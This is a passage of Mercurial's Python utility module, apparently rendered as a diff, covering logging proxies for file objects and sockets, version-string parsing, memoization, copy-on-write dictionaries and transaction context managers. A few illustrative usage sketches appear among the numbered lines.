760 'sendall', *args, **kwargs
760 'sendall', *args, **kwargs
761 )
761 )
762
762
763 def sendto(self, *args, **kwargs):
763 def sendto(self, *args, **kwargs):
764 return object.__getattribute__(self, '_observedcall')(
764 return object.__getattribute__(self, '_observedcall')(
765 'sendto', *args, **kwargs
765 'sendto', *args, **kwargs
766 )
766 )
767
767
768 def setblocking(self, *args, **kwargs):
768 def setblocking(self, *args, **kwargs):
769 return object.__getattribute__(self, '_observedcall')(
769 return object.__getattribute__(self, '_observedcall')(
770 'setblocking', *args, **kwargs
770 'setblocking', *args, **kwargs
771 )
771 )
772
772
773 def settimeout(self, *args, **kwargs):
773 def settimeout(self, *args, **kwargs):
774 return object.__getattribute__(self, '_observedcall')(
774 return object.__getattribute__(self, '_observedcall')(
775 'settimeout', *args, **kwargs
775 'settimeout', *args, **kwargs
776 )
776 )
777
777
778 def gettimeout(self, *args, **kwargs):
778 def gettimeout(self, *args, **kwargs):
779 return object.__getattribute__(self, '_observedcall')(
779 return object.__getattribute__(self, '_observedcall')(
780 'gettimeout', *args, **kwargs
780 'gettimeout', *args, **kwargs
781 )
781 )
782
782
783 def setsockopt(self, *args, **kwargs):
783 def setsockopt(self, *args, **kwargs):
784 return object.__getattribute__(self, '_observedcall')(
784 return object.__getattribute__(self, '_observedcall')(
785 'setsockopt', *args, **kwargs
785 'setsockopt', *args, **kwargs
786 )
786 )
787
787
788
788
789 class baseproxyobserver(object):
789 class baseproxyobserver(object):
790 def __init__(self, fh, name, logdata, logdataapis):
790 def __init__(self, fh, name, logdata, logdataapis):
791 self.fh = fh
791 self.fh = fh
792 self.name = name
792 self.name = name
793 self.logdata = logdata
793 self.logdata = logdata
794 self.logdataapis = logdataapis
794 self.logdataapis = logdataapis
795
795
796 def _writedata(self, data):
796 def _writedata(self, data):
797 if not self.logdata:
797 if not self.logdata:
798 if self.logdataapis:
798 if self.logdataapis:
799 self.fh.write(b'\n')
799 self.fh.write(b'\n')
800 self.fh.flush()
800 self.fh.flush()
801 return
801 return
802
802
803 # Simple case writes all data on a single line.
803 # Simple case writes all data on a single line.
804 if b'\n' not in data:
804 if b'\n' not in data:
805 if self.logdataapis:
805 if self.logdataapis:
806 self.fh.write(b': %s\n' % stringutil.escapestr(data))
806 self.fh.write(b': %s\n' % stringutil.escapestr(data))
807 else:
807 else:
808 self.fh.write(
808 self.fh.write(
809 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
809 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
810 )
810 )
811 self.fh.flush()
811 self.fh.flush()
812 return
812 return
813
813
814 # Data with newlines is written to multiple lines.
814 # Data with newlines is written to multiple lines.
815 if self.logdataapis:
815 if self.logdataapis:
816 self.fh.write(b':\n')
816 self.fh.write(b':\n')
817
817
818 lines = data.splitlines(True)
818 lines = data.splitlines(True)
819 for line in lines:
819 for line in lines:
820 self.fh.write(
820 self.fh.write(
821 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
821 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
822 )
822 )
823 self.fh.flush()
823 self.fh.flush()
824
824
825
825
826 class fileobjectobserver(baseproxyobserver):
826 class fileobjectobserver(baseproxyobserver):
827 """Logs file object activity."""
827 """Logs file object activity."""
828
828
829 def __init__(
829 def __init__(
830 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
830 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
831 ):
831 ):
832 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
832 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
833 self.reads = reads
833 self.reads = reads
834 self.writes = writes
834 self.writes = writes
835
835
836 def read(self, res, size=-1):
836 def read(self, res, size=-1):
837 if not self.reads:
837 if not self.reads:
838 return
838 return
839 # Python 3 can return None from reads at EOF instead of empty strings.
839 # Python 3 can return None from reads at EOF instead of empty strings.
840 if res is None:
840 if res is None:
841 res = b''
841 res = b''
842
842
843 if size == -1 and res == b'':
843 if size == -1 and res == b'':
844 # Suppress pointless read(-1) calls that return
844 # Suppress pointless read(-1) calls that return
845 # nothing. These happen _a lot_ on Python 3, and there
845 # nothing. These happen _a lot_ on Python 3, and there
846 # doesn't seem to be a better workaround to have matching
846 # doesn't seem to be a better workaround to have matching
847 # Python 2 and 3 behavior. :(
847 # Python 2 and 3 behavior. :(
848 return
848 return
849
849
850 if self.logdataapis:
850 if self.logdataapis:
851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852
852
853 self._writedata(res)
853 self._writedata(res)
854
854
855 def readline(self, res, limit=-1):
855 def readline(self, res, limit=-1):
856 if not self.reads:
856 if not self.reads:
857 return
857 return
858
858
859 if self.logdataapis:
859 if self.logdataapis:
860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861
861
862 self._writedata(res)
862 self._writedata(res)
863
863
864 def readinto(self, res, dest):
864 def readinto(self, res, dest):
865 if not self.reads:
865 if not self.reads:
866 return
866 return
867
867
868 if self.logdataapis:
868 if self.logdataapis:
869 self.fh.write(
869 self.fh.write(
870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 )
871 )
872
872
873 data = dest[0:res] if res is not None else b''
873 data = dest[0:res] if res is not None else b''
874
874
875 # _writedata() uses "in" operator and is confused by memoryview because
875 # _writedata() uses "in" operator and is confused by memoryview because
876 # characters are ints on Python 3.
876 # characters are ints on Python 3.
877 if isinstance(data, memoryview):
877 if isinstance(data, memoryview):
878 data = data.tobytes()
878 data = data.tobytes()
879
879
880 self._writedata(data)
880 self._writedata(data)
881
881
882 def write(self, res, data):
882 def write(self, res, data):
883 if not self.writes:
883 if not self.writes:
884 return
884 return
885
885
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 # returns the integer bytes written.
887 # returns the integer bytes written.
888 if res is None and data:
888 if res is None and data:
889 res = len(data)
889 res = len(data)
890
890
891 if self.logdataapis:
891 if self.logdataapis:
892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893
893
894 self._writedata(data)
894 self._writedata(data)
895
895
896 def flush(self, res):
896 def flush(self, res):
897 if not self.writes:
897 if not self.writes:
898 return
898 return
899
899
900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901
901
902 # For observedbufferedinputpipe.
902 # For observedbufferedinputpipe.
903 def bufferedread(self, res, size):
903 def bufferedread(self, res, size):
904 if not self.reads:
904 if not self.reads:
905 return
905 return
906
906
907 if self.logdataapis:
907 if self.logdataapis:
908 self.fh.write(
908 self.fh.write(
909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 )
910 )
911
911
912 self._writedata(res)
912 self._writedata(res)
913
913
914 def bufferedreadline(self, res):
914 def bufferedreadline(self, res):
915 if not self.reads:
915 if not self.reads:
916 return
916 return
917
917
918 if self.logdataapis:
918 if self.logdataapis:
919 self.fh.write(
919 self.fh.write(
920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 )
921 )
922
922
923 self._writedata(res)
923 self._writedata(res)
924
924
925
925
926 def makeloggingfileobject(
926 def makeloggingfileobject(
927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 ):
928 ):
929 """Turn a file object into a logging file object."""
929 """Turn a file object into a logging file object."""
930
930
931 observer = fileobjectobserver(
931 observer = fileobjectobserver(
932 logh,
932 logh,
933 name,
933 name,
934 reads=reads,
934 reads=reads,
935 writes=writes,
935 writes=writes,
936 logdata=logdata,
936 logdata=logdata,
937 logdataapis=logdataapis,
937 logdataapis=logdataapis,
938 )
938 )
939 return fileobjectproxy(fh, observer)
939 return fileobjectproxy(fh, observer)
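
# A minimal usage sketch (not part of the original module): wrap an
# in-memory file object so its read() calls are logged to a separate
# sink. It assumes the fileobjectproxy wrapper defined earlier in this
# module transparently delegates to the wrapped object; the helper name
# below is ours, purely illustrative.
def _example_makeloggingfileobject():
    import io

    logh = io.BytesIO()  # where the observer writes its log lines
    fh = io.BytesIO(b'some payload')
    proxy = makeloggingfileobject(logh, fh, b'example', logdata=True)
    proxy.read(4)  # logged roughly as "example> read(4) -> 4", plus the data
    return logh.getvalue()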
940
940
941
941
942 class socketobserver(baseproxyobserver):
942 class socketobserver(baseproxyobserver):
943 """Logs socket activity."""
943 """Logs socket activity."""
944
944
945 def __init__(
945 def __init__(
946 self,
946 self,
947 fh,
947 fh,
948 name,
948 name,
949 reads=True,
949 reads=True,
950 writes=True,
950 writes=True,
951 states=True,
951 states=True,
952 logdata=False,
952 logdata=False,
953 logdataapis=True,
953 logdataapis=True,
954 ):
954 ):
955 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
955 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
956 self.reads = reads
956 self.reads = reads
957 self.writes = writes
957 self.writes = writes
958 self.states = states
958 self.states = states
959
959
960 def makefile(self, res, mode=None, bufsize=None):
960 def makefile(self, res, mode=None, bufsize=None):
961 if not self.states:
961 if not self.states:
962 return
962 return
963
963
964 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
964 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
965
965
966 def recv(self, res, size, flags=0):
966 def recv(self, res, size, flags=0):
967 if not self.reads:
967 if not self.reads:
968 return
968 return
969
969
970 if self.logdataapis:
970 if self.logdataapis:
971 self.fh.write(
971 self.fh.write(
972 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
972 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
973 )
973 )
974 self._writedata(res)
974 self._writedata(res)
975
975
976 def recvfrom(self, res, size, flags=0):
976 def recvfrom(self, res, size, flags=0):
977 if not self.reads:
977 if not self.reads:
978 return
978 return
979
979
980 if self.logdataapis:
980 if self.logdataapis:
981 self.fh.write(
981 self.fh.write(
982 b'%s> recvfrom(%d, %d) -> %d'
982 b'%s> recvfrom(%d, %d) -> %d'
983 % (self.name, size, flags, len(res[0]))
983 % (self.name, size, flags, len(res[0]))
984 )
984 )
985
985
986 self._writedata(res[0])
986 self._writedata(res[0])
987
987
988 def recvfrom_into(self, res, buf, size, flags=0):
988 def recvfrom_into(self, res, buf, size, flags=0):
989 if not self.reads:
989 if not self.reads:
990 return
990 return
991
991
992 if self.logdataapis:
992 if self.logdataapis:
993 self.fh.write(
993 self.fh.write(
994 b'%s> recvfrom_into(%d, %d) -> %d'
994 b'%s> recvfrom_into(%d, %d) -> %d'
995 % (self.name, size, flags, res[0])
995 % (self.name, size, flags, res[0])
996 )
996 )
997
997
998 self._writedata(buf[0 : res[0]])
998 self._writedata(buf[0 : res[0]])
999
999
1000 def recv_into(self, res, buf, size=0, flags=0):
1000 def recv_into(self, res, buf, size=0, flags=0):
1001 if not self.reads:
1001 if not self.reads:
1002 return
1002 return
1003
1003
1004 if self.logdataapis:
1004 if self.logdataapis:
1005 self.fh.write(
1005 self.fh.write(
1006 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1006 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1007 )
1007 )
1008
1008
1009 self._writedata(buf[0:res])
1009 self._writedata(buf[0:res])
1010
1010
1011 def send(self, res, data, flags=0):
1011 def send(self, res, data, flags=0):
1012 if not self.writes:
1012 if not self.writes:
1013 return
1013 return
1014
1014
1015 self.fh.write(
1015 self.fh.write(
1016 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1016 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1017 )
1017 )
1018 self._writedata(data)
1018 self._writedata(data)
1019
1019
1020 def sendall(self, res, data, flags=0):
1020 def sendall(self, res, data, flags=0):
1021 if not self.writes:
1021 if not self.writes:
1022 return
1022 return
1023
1023
1024 if self.logdataapis:
1024 if self.logdataapis:
1025 # Returns None on success. So don't bother reporting return value.
1025 # Returns None on success. So don't bother reporting return value.
1026 self.fh.write(
1026 self.fh.write(
1027 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1027 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1028 )
1028 )
1029
1029
1030 self._writedata(data)
1030 self._writedata(data)
1031
1031
1032 def sendto(self, res, data, flagsoraddress, address=None):
1032 def sendto(self, res, data, flagsoraddress, address=None):
1033 if not self.writes:
1033 if not self.writes:
1034 return
1034 return
1035
1035
1036 if address:
1036 if address:
1037 flags = flagsoraddress
1037 flags = flagsoraddress
1038 else:
1038 else:
1039 flags = 0
1039 flags = 0
1040
1040
1041 if self.logdataapis:
1041 if self.logdataapis:
1042 self.fh.write(
1042 self.fh.write(
1043 b'%s> sendto(%d, %d, %r) -> %d'
1043 b'%s> sendto(%d, %d, %r) -> %d'
1044 % (self.name, len(data), flags, address, res)
1044 % (self.name, len(data), flags, address, res)
1045 )
1045 )
1046
1046
1047 self._writedata(data)
1047 self._writedata(data)
1048
1048
1049 def setblocking(self, res, flag):
1049 def setblocking(self, res, flag):
1050 if not self.states:
1050 if not self.states:
1051 return
1051 return
1052
1052
1053 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1053 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1054
1054
1055 def settimeout(self, res, value):
1055 def settimeout(self, res, value):
1056 if not self.states:
1056 if not self.states:
1057 return
1057 return
1058
1058
1059 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1059 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1060
1060
1061 def gettimeout(self, res):
1061 def gettimeout(self, res):
1062 if not self.states:
1062 if not self.states:
1063 return
1063 return
1064
1064
1065 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1065 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1066
1066
1067 def setsockopt(self, res, level, optname, value):
1067 def setsockopt(self, res, level, optname, value):
1068 if not self.states:
1068 if not self.states:
1069 return
1069 return
1070
1070
1071 self.fh.write(
1071 self.fh.write(
1072 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1072 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1073 % (self.name, level, optname, value, res)
1073 % (self.name, level, optname, value, res)
1074 )
1074 )
1075
1075
1076
1076
1077 def makeloggingsocket(
1077 def makeloggingsocket(
1078 logh,
1078 logh,
1079 fh,
1079 fh,
1080 name,
1080 name,
1081 reads=True,
1081 reads=True,
1082 writes=True,
1082 writes=True,
1083 states=True,
1083 states=True,
1084 logdata=False,
1084 logdata=False,
1085 logdataapis=True,
1085 logdataapis=True,
1086 ):
1086 ):
1087 """Turn a socket into a logging socket."""
1087 """Turn a socket into a logging socket."""
1088
1088
1089 observer = socketobserver(
1089 observer = socketobserver(
1090 logh,
1090 logh,
1091 name,
1091 name,
1092 reads=reads,
1092 reads=reads,
1093 writes=writes,
1093 writes=writes,
1094 states=states,
1094 states=states,
1095 logdata=logdata,
1095 logdata=logdata,
1096 logdataapis=logdataapis,
1096 logdataapis=logdataapis,
1097 )
1097 )
1098 return socketproxy(fh, observer)
1098 return socketproxy(fh, observer)
1099
1099
1100
1100
1101 def version():
1101 def version():
1102 """Return version information if available."""
1102 """Return version information if available."""
1103 try:
1103 try:
1104 from . import __version__
1104 from . import __version__
1105
1105
1106 return __version__.version
1106 return __version__.version
1107 except ImportError:
1107 except ImportError:
1108 return b'unknown'
1108 return b'unknown'
1109
1109
1110
1110
1111 def versiontuple(v=None, n=4):
1111 def versiontuple(v=None, n=4):
1112 """Parses a Mercurial version string into an N-tuple.
1112 """Parses a Mercurial version string into an N-tuple.
1113
1113
1114 The version string to be parsed is specified with the ``v`` argument.
1114 The version string to be parsed is specified with the ``v`` argument.
1115 If it isn't defined, the current Mercurial version string will be parsed.
1115 If it isn't defined, the current Mercurial version string will be parsed.
1116
1116
1117 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1117 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1118 returned values:
1118 returned values:
1119
1119
1120 >>> v = b'3.6.1+190-df9b73d2d444'
1120 >>> v = b'3.6.1+190-df9b73d2d444'
1121 >>> versiontuple(v, 2)
1121 >>> versiontuple(v, 2)
1122 (3, 6)
1122 (3, 6)
1123 >>> versiontuple(v, 3)
1123 >>> versiontuple(v, 3)
1124 (3, 6, 1)
1124 (3, 6, 1)
1125 >>> versiontuple(v, 4)
1125 >>> versiontuple(v, 4)
1126 (3, 6, 1, '190-df9b73d2d444')
1126 (3, 6, 1, '190-df9b73d2d444')
1127
1127
1128 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1128 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1129 (3, 6, 1, '190-df9b73d2d444+20151118')
1129 (3, 6, 1, '190-df9b73d2d444+20151118')
1130
1130
1131 >>> v = b'3.6'
1131 >>> v = b'3.6'
1132 >>> versiontuple(v, 2)
1132 >>> versiontuple(v, 2)
1133 (3, 6)
1133 (3, 6)
1134 >>> versiontuple(v, 3)
1134 >>> versiontuple(v, 3)
1135 (3, 6, None)
1135 (3, 6, None)
1136 >>> versiontuple(v, 4)
1136 >>> versiontuple(v, 4)
1137 (3, 6, None, None)
1137 (3, 6, None, None)
1138
1138
1139 >>> v = b'3.9-rc'
1139 >>> v = b'3.9-rc'
1140 >>> versiontuple(v, 2)
1140 >>> versiontuple(v, 2)
1141 (3, 9)
1141 (3, 9)
1142 >>> versiontuple(v, 3)
1142 >>> versiontuple(v, 3)
1143 (3, 9, None)
1143 (3, 9, None)
1144 >>> versiontuple(v, 4)
1144 >>> versiontuple(v, 4)
1145 (3, 9, None, 'rc')
1145 (3, 9, None, 'rc')
1146
1146
1147 >>> v = b'3.9-rc+2-02a8fea4289b'
1147 >>> v = b'3.9-rc+2-02a8fea4289b'
1148 >>> versiontuple(v, 2)
1148 >>> versiontuple(v, 2)
1149 (3, 9)
1149 (3, 9)
1150 >>> versiontuple(v, 3)
1150 >>> versiontuple(v, 3)
1151 (3, 9, None)
1151 (3, 9, None)
1152 >>> versiontuple(v, 4)
1152 >>> versiontuple(v, 4)
1153 (3, 9, None, 'rc+2-02a8fea4289b')
1153 (3, 9, None, 'rc+2-02a8fea4289b')
1154
1154
1155 >>> versiontuple(b'4.6rc0')
1155 >>> versiontuple(b'4.6rc0')
1156 (4, 6, None, 'rc0')
1156 (4, 6, None, 'rc0')
1157 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1157 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1158 (4, 6, None, 'rc0+12-425d55e54f98')
1158 (4, 6, None, 'rc0+12-425d55e54f98')
1159 >>> versiontuple(b'.1.2.3')
1159 >>> versiontuple(b'.1.2.3')
1160 (None, None, None, '.1.2.3')
1160 (None, None, None, '.1.2.3')
1161 >>> versiontuple(b'12.34..5')
1161 >>> versiontuple(b'12.34..5')
1162 (12, 34, None, '..5')
1162 (12, 34, None, '..5')
1163 >>> versiontuple(b'1.2.3.4.5.6')
1163 >>> versiontuple(b'1.2.3.4.5.6')
1164 (1, 2, 3, '.4.5.6')
1164 (1, 2, 3, '.4.5.6')
1165 """
1165 """
1166 if not v:
1166 if not v:
1167 v = version()
1167 v = version()
1168 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1168 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1169 if not m:
1169 if not m:
1170 vparts, extra = b'', v
1170 vparts, extra = b'', v
1171 elif m.group(2):
1171 elif m.group(2):
1172 vparts, extra = m.groups()
1172 vparts, extra = m.groups()
1173 else:
1173 else:
1174 vparts, extra = m.group(1), None
1174 vparts, extra = m.group(1), None
1175
1175
1176 assert vparts is not None # help pytype
1176 assert vparts is not None # help pytype
1177
1177
1178 vints = []
1178 vints = []
1179 for i in vparts.split(b'.'):
1179 for i in vparts.split(b'.'):
1180 try:
1180 try:
1181 vints.append(int(i))
1181 vints.append(int(i))
1182 except ValueError:
1182 except ValueError:
1183 break
1183 break
1184 # (3, 6) -> (3, 6, None)
1184 # (3, 6) -> (3, 6, None)
1185 while len(vints) < 3:
1185 while len(vints) < 3:
1186 vints.append(None)
1186 vints.append(None)
1187
1187
1188 if n == 2:
1188 if n == 2:
1189 return (vints[0], vints[1])
1189 return (vints[0], vints[1])
1190 if n == 3:
1190 if n == 3:
1191 return (vints[0], vints[1], vints[2])
1191 return (vints[0], vints[1], vints[2])
1192 if n == 4:
1192 if n == 4:
1193 return (vints[0], vints[1], vints[2], extra)
1193 return (vints[0], vints[1], vints[2], extra)
1194
1194
1195
1195
1196 def cachefunc(func):
1196 def cachefunc(func):
1197 '''cache the result of function calls'''
1197 '''cache the result of function calls'''
1198 # XXX doesn't handle keyword args
1199 if func.__code__.co_argcount == 0:
1199 if func.__code__.co_argcount == 0:
1200 listcache = []
1200 listcache = []
1201
1201
1202 def f():
1202 def f():
1203 if len(listcache) == 0:
1203 if len(listcache) == 0:
1204 listcache.append(func())
1204 listcache.append(func())
1205 return listcache[0]
1205 return listcache[0]
1206
1206
1207 return f
1207 return f
1208 cache = {}
1208 cache = {}
1209 if func.__code__.co_argcount == 1:
1209 if func.__code__.co_argcount == 1:
1210 # we gain a small amount of time because
1210 # we gain a small amount of time because
1211 # we don't need to pack/unpack the list
1211 # we don't need to pack/unpack the list
1212 def f(arg):
1212 def f(arg):
1213 if arg not in cache:
1213 if arg not in cache:
1214 cache[arg] = func(arg)
1214 cache[arg] = func(arg)
1215 return cache[arg]
1215 return cache[arg]
1216
1216
1217 else:
1217 else:
1218
1218
1219 def f(*args):
1219 def f(*args):
1220 if args not in cache:
1220 if args not in cache:
1221 cache[args] = func(*args)
1221 cache[args] = func(*args)
1222 return cache[args]
1222 return cache[args]
1223
1223
1224 return f
1224 return f
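
# A minimal usage sketch (not part of the original module): memoize a
# one-argument function with cachefunc; the names below are illustrative.
def _example_cachefunc():
    calls = []

    def square(x):
        calls.append(x)
        return x * x

    cached = cachefunc(square)
    cached(3)
    cached(3)  # the second call is answered from the cache
    return len(calls)  # 1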
1225
1225
1226
1226
1227 class cow(object):
1227 class cow(object):
1228 """helper class to make copy-on-write easier
1228 """helper class to make copy-on-write easier
1229
1229
1230 Call preparewrite before doing any writes.
1230 Call preparewrite before doing any writes.
1231 """
1231 """
1232
1232
1233 def preparewrite(self):
1233 def preparewrite(self):
1234 """call this before writes, return self or a copied new object"""
1234 """call this before writes, return self or a copied new object"""
1235 if getattr(self, '_copied', 0):
1235 if getattr(self, '_copied', 0):
1236 self._copied -= 1
1236 self._copied -= 1
1237 return self.__class__(self)
1237 return self.__class__(self)
1238 return self
1238 return self
1239
1239
1240 def copy(self):
1240 def copy(self):
1241 """always do a cheap copy"""
1241 """always do a cheap copy"""
1242 self._copied = getattr(self, '_copied', 0) + 1
1242 self._copied = getattr(self, '_copied', 0) + 1
1243 return self
1243 return self
1244
1244
1245
1245
1246 class sortdict(collections.OrderedDict):
1246 class sortdict(collections.OrderedDict):
1247 '''a simple insertion-ordered dictionary
1248
1248
1249 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1249 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1250 >>> d2 = d1.copy()
1250 >>> d2 = d1.copy()
1251 >>> d2
1251 >>> d2
1252 sortdict([('a', 0), ('b', 1)])
1252 sortdict([('a', 0), ('b', 1)])
1253 >>> d2.update([(b'a', 2)])
1253 >>> d2.update([(b'a', 2)])
1254 >>> list(d2.keys()) # should still be in last-set order
1254 >>> list(d2.keys()) # should still be in last-set order
1255 ['b', 'a']
1255 ['b', 'a']
1256 >>> d1.insert(1, b'a.5', 0.5)
1256 >>> d1.insert(1, b'a.5', 0.5)
1257 >>> d1
1257 >>> d1
1258 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1258 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1259 '''
1259 '''
1260
1260
1261 def __setitem__(self, key, value):
1261 def __setitem__(self, key, value):
1262 if key in self:
1262 if key in self:
1263 del self[key]
1263 del self[key]
1264 super(sortdict, self).__setitem__(key, value)
1264 super(sortdict, self).__setitem__(key, value)
1265
1265
1266 if pycompat.ispypy:
1266 if pycompat.ispypy:
1267 # __setitem__() isn't called as of PyPy 5.8.0
1267 # __setitem__() isn't called as of PyPy 5.8.0
1268 def update(self, src):
1268 def update(self, src):
1269 if isinstance(src, dict):
1269 if isinstance(src, dict):
1270 src = pycompat.iteritems(src)
1270 src = pycompat.iteritems(src)
1271 for k, v in src:
1271 for k, v in src:
1272 self[k] = v
1272 self[k] = v
1273
1273
1274 def insert(self, position, key, value):
1274 def insert(self, position, key, value):
1275 for (i, (k, v)) in enumerate(list(self.items())):
1275 for (i, (k, v)) in enumerate(list(self.items())):
1276 if i == position:
1276 if i == position:
1277 self[key] = value
1277 self[key] = value
1278 if i >= position:
1278 if i >= position:
1279 del self[k]
1279 del self[k]
1280 self[k] = v
1280 self[k] = v
1281
1281
1282
1282
1283 class cowdict(cow, dict):
1283 class cowdict(cow, dict):
1284 """copy-on-write dict
1284 """copy-on-write dict
1285
1285
1286 Be sure to call d = d.preparewrite() before writing to d.
1286 Be sure to call d = d.preparewrite() before writing to d.
1287
1287
1288 >>> a = cowdict()
1288 >>> a = cowdict()
1289 >>> a is a.preparewrite()
1289 >>> a is a.preparewrite()
1290 True
1290 True
1291 >>> b = a.copy()
1291 >>> b = a.copy()
1292 >>> b is a
1292 >>> b is a
1293 True
1293 True
1294 >>> c = b.copy()
1294 >>> c = b.copy()
1295 >>> c is a
1295 >>> c is a
1296 True
1296 True
1297 >>> a = a.preparewrite()
1297 >>> a = a.preparewrite()
1298 >>> b is a
1298 >>> b is a
1299 False
1299 False
1300 >>> a is a.preparewrite()
1300 >>> a is a.preparewrite()
1301 True
1301 True
1302 >>> c = c.preparewrite()
1302 >>> c = c.preparewrite()
1303 >>> b is c
1303 >>> b is c
1304 False
1304 False
1305 >>> b is b.preparewrite()
1305 >>> b is b.preparewrite()
1306 True
1306 True
1307 """
1307 """
1308
1308
1309
1309
1310 class cowsortdict(cow, sortdict):
1310 class cowsortdict(cow, sortdict):
1311 """copy-on-write sortdict
1311 """copy-on-write sortdict
1312
1312
1313 Be sure to call d = d.preparewrite() before writing to d.
1313 Be sure to call d = d.preparewrite() before writing to d.
1314 """
1314 """
1315
1315
1316
1316
1317 class transactional(object): # pytype: disable=ignored-metaclass
1317 class transactional(object): # pytype: disable=ignored-metaclass
1318 """Base class for making a transactional type into a context manager."""
1318 """Base class for making a transactional type into a context manager."""
1319
1319
1320 __metaclass__ = abc.ABCMeta
1320 __metaclass__ = abc.ABCMeta
1321
1321
1322 @abc.abstractmethod
1322 @abc.abstractmethod
1323 def close(self):
1323 def close(self):
1324 """Successfully closes the transaction."""
1324 """Successfully closes the transaction."""
1325
1325
1326 @abc.abstractmethod
1326 @abc.abstractmethod
1327 def release(self):
1327 def release(self):
1328 """Marks the end of the transaction.
1328 """Marks the end of the transaction.
1329
1329
1330 If the transaction has not been closed, it will be aborted.
1330 If the transaction has not been closed, it will be aborted.
1331 """
1331 """
1332
1332
1333 def __enter__(self):
1333 def __enter__(self):
1334 return self
1334 return self
1335
1335
1336 def __exit__(self, exc_type, exc_val, exc_tb):
1336 def __exit__(self, exc_type, exc_val, exc_tb):
1337 try:
1337 try:
1338 if exc_type is None:
1338 if exc_type is None:
1339 self.close()
1339 self.close()
1340 finally:
1340 finally:
1341 self.release()
1341 self.release()
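
# A minimal sketch (not part of the original module) of the smallest
# possible transactional subclass, used as a context manager; the class
# and attribute names are illustrative only.
def _example_transactional():
    class demotxn(transactional):
        def __init__(self):
            self.state = b'pending'

        def close(self):
            self.state = b'committed'

        def release(self):
            if self.state != b'committed':
                self.state = b'aborted'

    with demotxn() as txn:
        pass  # no exception: __exit__ calls close(), then release()
    return txn.state  # b'committed'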
1342
1342
1343
1343
1344 @contextlib.contextmanager
1344 @contextlib.contextmanager
1345 def acceptintervention(tr=None):
1345 def acceptintervention(tr=None):
1346 """A context manager that closes the transaction on InterventionRequired
1346 """A context manager that closes the transaction on InterventionRequired
1347
1347
1348 If no transaction was provided, this simply runs the body and returns.
1349 """
1349 """
1350 if not tr:
1350 if not tr:
1351 yield
1351 yield
1352 return
1352 return
1353 try:
1353 try:
1354 yield
1354 yield
1355 tr.close()
1355 tr.close()
1356 except error.InterventionRequired:
1356 except error.InterventionRequired:
1357 tr.close()
1357 tr.close()
1358 raise
1358 raise
1359 finally:
1359 finally:
1360 tr.release()
1360 tr.release()
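
# A minimal sketch (not part of the original module): a dummy transaction
# records that acceptintervention() still closes it when the body raises
# InterventionRequired. The dummy class is illustrative only.
def _example_acceptintervention():
    class dummytr(object):
        closed = released = False

        def close(self):
            self.closed = True

        def release(self):
            self.released = True

    tr = dummytr()
    try:
        with acceptintervention(tr):
            raise error.InterventionRequired(b'resolve conflicts first')
    except error.InterventionRequired:
        pass
    return tr.closed, tr.released  # (True, True)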
1361
1361
1362
1362
1363 @contextlib.contextmanager
1363 @contextlib.contextmanager
1364 def nullcontextmanager():
1364 def nullcontextmanager():
1365 yield
1365 yield
1366
1366
1367
1367
1368 class _lrucachenode(object):
1368 class _lrucachenode(object):
1369 """A node in a doubly linked list.
1369 """A node in a doubly linked list.
1370
1370
